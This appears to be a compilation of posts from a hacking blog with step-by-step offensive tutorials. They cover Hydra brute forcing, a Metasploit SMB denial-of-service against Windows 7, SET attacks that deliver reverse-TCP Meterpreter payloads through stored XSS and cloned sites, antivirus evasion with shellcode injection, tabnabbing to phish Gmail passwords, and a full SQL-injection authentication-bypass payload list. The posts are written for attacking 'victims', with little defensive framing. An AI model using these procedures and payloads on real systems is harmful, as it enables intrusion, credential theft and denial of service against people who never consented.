Brute-Force attack using HYDRA

What is BRUTE-FORCE attack ?

A password attack that does not attempt to decrypt any information, but continue to try different passwords. For example, a brute-force attack may have a dictionary of all words or a listing of commonly used passwords. To gain access to an account using a brute-force attack, a program tries all available words it has to gain access to the account. Another type of brute-force attack is a program that runs through all letters or letters and numbers until it gets a match.

How to install THC-hydra ?

Open your terminal & type following command

(1)sudo bash

(2)wget http://freeworld.thc.org/releases/hydra-6.3-src.tar.gz

(3)After downloading ,we are going to extract it

tar -xvf hydra-6.3-src.tar.gz

(4)tar -xvf hydra-6.3-src.tar.gz

(5)./configure && make && install

(6)make install

Web application and audit framework

w3af is a complete environment for auditing and attacking web applications. This environment provides a solid platform for web vulnerability assessments and penetration tests.

Download:-

The framework can be downloaded from the project main page:

http://www.w3af.com/#download

Installation:-

Some of the requirements are bundled with the distribution file, in order to make

the installation process easier for the novice user. The bundled requirements can

be found inside the extlib directory. Most of the libraries can be run from that

directory, but some others require an installation process, the installation steps

for these libraries are (as root):

cd w3af

cd extlib

cd fpconst­0.7.2

python setup.py install

cd ..

cd SOAPpy

python setup.py install

cd ..

cd pyPdf

python setup.py install

Running w3af:-

w3af has two user interfaces, the console user interface (consoleUI) and the

graphical user interface (gtkUi). To use console interface type

./w3af_console

w3af>>>

If you are using w3af first time then I recommended you to use graphical user interface.

./w3af_gui

The graphical user interface allows you to perform all the actions that the

framework offers and features a much easier and faster way to start a scan and

analyze the results.

If you want to know more about plugins & console interface, here is document. You can Download it.

DOS attack on windows-7 using metasploit

-->

This module exploits a denial of service flaw in the Microsoft Windows SMB client 

on Windows 7 and Windows Server 2008 R2. To trigger this bug, run this module 

as a service and forces a vulnerable client to access the IP of this system as an 

SMB  server. This can be accomplished by embedding a UNC path (\HOST\share

\something) into a web page if the target is using Internet Explorer, or a Word 

document otherwise.

(1)msfconsole

(2)use dos/windows/smb/ms10_006_negotiate_response_loop

(3)show options

(4)set SRVHOST I.P. of local machine 

(5)exploit

[*] Starting the malicious SMB service...

[*] To trigger, the vulnerable client should try to access: \\I.P.\Shared\Anything

[*] Server started.

If the system that accessed that location is vulnerable, it will immediately freeze. To get out of that state, restart the system.

How to exploit stored xss using S.E.T?

Stored XSS is the most dangerous type of cross site scripting due to the fact that the user can be exploited just by visiting the web page where the vulnerability occurs.Also if that user happens to be the administrator of the website then this can lead to compromise the web application which is one of the reasons that the risk is higher than a reflected XSS.

(1)First I recommended you to view “How to fiind xss in website?” here.
(2)Open terminal & type following code in terminal.
sudo bash
cd /opt/set
./set
(3)Now select option 1 which is Social-Engineering Attacks.
(4)Select option 2 which is website attack vector.
(5)Select option 3which is Java Applet Attack Method.
(6)Select option 1 web -templetes.
(7)Select option 1 java Required.
(8)Now we will select payload & encoder. So we select simple Windows Reverse_TCP Meterpreter & shikata_ga_nai encoding.
(9)Put listener port:443 . Now metasploit will open.
(10)Now we can go back to the web application and we can try to insert the malicious JavaScript code in the comment field that we already know from before that is vulnerable to XSS.

How to view USB History of Windows PC?

-->

USBDeview is a small utility that lists all USB devices that currently connected to your computer, as well as all USB devices that you previously used.
For each USB device, extended information is displayed: Device name/description, device type, serial number (for mass storage devices), the date/time that device was added, VendorID, ProductID, and more.
USBDeview also allows you to uninstall USB devices that you previously used, disconnect USB devices that are currently connected to your computer, as well as to disable and enable USB devices.

                 Download USBDeview For X32 System

                 Download USBDeview For X64 System  
You can also use USBDeview on a remote computer, as long as you login to that computer with admin user.

Connecting To Remote Computer

The following command-line options allows you to connect to remote computers. You must login to the remote computer with admin user in order to use these options.

• /remote <\\Computer Name>
  Allows you to connect a single remote computer.
  For Example:
  USBDeview.exe /remote \\MyComp
• /remotefile <Computers List File>
  Allows you to connect multiple computers, and view all their USB activity in one window. The computers list file should be a simple Ascii text file with computer names separated by colon, semicolon, space, tab characters or CRLF.
  For Example:
  USBDeview.exe /remotefile "c:\temp\comp.txt"
  
  

Bypass Antivirus using S.E.T

Bypass Antivirus using multyply injector shell code using SET & Metasploit

Requirement

Victim`s O.S.- windows.

Attacker:- S.E.T ,Metasploit.

(1)Open terminal & type following command

sudo bash

cd /opt/set

./set

(2)Now select option 1 social engineering attack

(3)Select option 2 website attack vector

(4)Now we will choose the option 1 the Java Applet Attack Method

(5)Now we will choose option 2, “Site Cloner”
(6)Enter the URL to clone: http://www.google.com (but you can use any website to run the Java Applet)
(7)Now choose 16 “Multi PyInjector Shellcode Injection”,
(8)Port of the attacker computer. In this example I use port 443
(9)Select the payload you want to deliver via shellcodeexec press enter here
(10)Now again select Port of the attacker computer. In this example I use port 444 and 445
(11)Select the payload you want to deliver via shellcodeexec press enter here
(12)send your I.p. To victim. As soon as he open link & run java applet you have access of victim `s pc
(13)sessions -l
(14)sessions -i I.d

List Of Vulnerability & it`s Tutorial.

It`s 100<sup>th</sup> post. When I started to write , I did not think that it may longer this.So today I don`t put any new article about hacking , I am gonna repeat some famous vulnerability which we had seen before.

In the chart , you can see that different types of vulnerability & it`s percentage which exists in website.

This is web-browser vulnerability . So you can see that which browser is easy to hack.

(A)S.Q.L. Injection:-It is a hacking method that allows an unauthorized attacker to access a database server. It is facilitated by a common coding blunder: the program accepts data from a client and executes SQL queries without first validating the client’s input. The attacker is then free to extract,

modify, add, or delete content from the database.

Tutorial on S.Q.L. Injection:-

(1)S.Q.L. Injection manual

(2)S.Q.L.Injection using Havij (For windows user)

(3)S.Q.Linjection using S.Q.L. Map (For linux user)

Sql Injection Authentication bypass cheat sheet

This list can be used by Hackers when testing for SQL injection authentication bypass.A Hacker can use it manually or through burp in order to automate the process.If you have any other suggestions please feel free to leave a comment in order to improve and expand the list.

or 1=1

or 1=1--

or 1=1#

or 1=1/*

admin' --

admin' #

admin'/*

admin' or '1'='1

admin' or '1'='1'--

admin' or '1'='1'#

admin' or '1'='1'/*

admin'or 1=1 or ''='

admin' or 1=1

admin' or 1=1--

admin' or 1=1#

admin' or 1=1/*

admin') or ('1'='1

admin') or ('1'='1'--

admin') or ('1'='1'#

admin') or ('1'='1'/*

admin') or '1'='1

admin') or '1'='1'--

admin') or '1'='1'#

admin') or '1'='1'/*

1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

admin" --

admin" #

admin"/*

admin" or "1"="1

admin" or "1"="1"--

admin" or "1"="1"#

admin" or "1"="1"/*

admin"or 1=1 or ""="

admin" or 1=1

admin" or 1=1--

admin" or 1=1#

admin" or 1=1/*

admin") or ("1"="1

admin") or ("1"="1"--

admin") or ("1"="1"#

admin") or ("1"="1"/*

admin") or "1"="1

admin") or "1"="1"--

admin") or "1"="1"#

admin") or "1"="1"/*

1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

How to move S.E.T. to Github?

The Social-Engineer Toolkit (SET) and the Artillery open source projects have officially been moved to github. Github provides a much faster platform to getting releases up and a more efficient method for obtaining new releases to SET.

All you need to do to go from the current version to git is do an svn update in the set directory and run the automatic installer. SET updates once pulled through github will now be pulled from the github repositories versus svn. The subversion repos will remain active for a couple months.

How to Move S.E.T. to Github ?
cd /pentest/exploits/set(for ubuntu user cd /opt/set)
svn update
./set
[-] New set_config.py file generated on: 2013-01-04 10:54:25.898164
[-] Verifying configuration update...
[*] Update verified, config timestamp is: 2013-01-04 10:54:25.898164
[*] SET is using the new config, no need to restart[!] The Social-Engineer Toolkit has officially moved to github and no longer uses SVN.
[!] Ensure that you have GIT installed and this conversion tool will automatically pull the latest git version for you.
[!] Do you want to do a manual install or have SET do the conversion to GIT for you?

1. Automatic
2. Manual
3. Continue using SET (NO UPDATES ANYMORE!)

Tabnabbing Tutorial

Tabnabbing is a computer exploit and phishing attack, which persuades users to submit their login details and passwords to popular websites by impersonating those sites and convincing the user that the site is genuine.The attack takes advantage of user trust and inattention to detail in regard to tabs, and the ability of modern web pages to rewrite tabs and their contents a long time after the page is loaded. Tabnabbing operates in reverse of most phishing attacks in that it doesn’t ask users to click on an obfuscated link but instead loads a fake page in one of the open tabs in your browser

We cover two methods of tabnabbing.

(1)Manual.

(2)With the help of S.E.T.

Tabnabbing with help of S.E.T?

(1)Open S.E.T.(you can find how to install & configure set here?)

(2)Select option 1 which is Social-Engineering Attacks.

(3)Select option 2 which is Website Attack Vectors.

(4)Now option-4 which is tabnabbing attack method

(5)Select site cloner.

(6)Enter URL OF site. (For example if you want to hack gmail account of victim ,then type gmail.com.)

(7)Send link of your I.P. To victim via mail or chat.(You can aslo spoofemail. See here.)

(8)As soon as he open tab , he found message that “please wait while site is loading.”

(9)when victim change tab, it redirect him to your phishing page.

In next tutorial we will see manual method of tabnabbing. Because if you have dynamic I.p than this method is not so useful, because as soon as your I.p. Change , listner of S.E.T. Is stopped. So you cannot get passowrd of victim.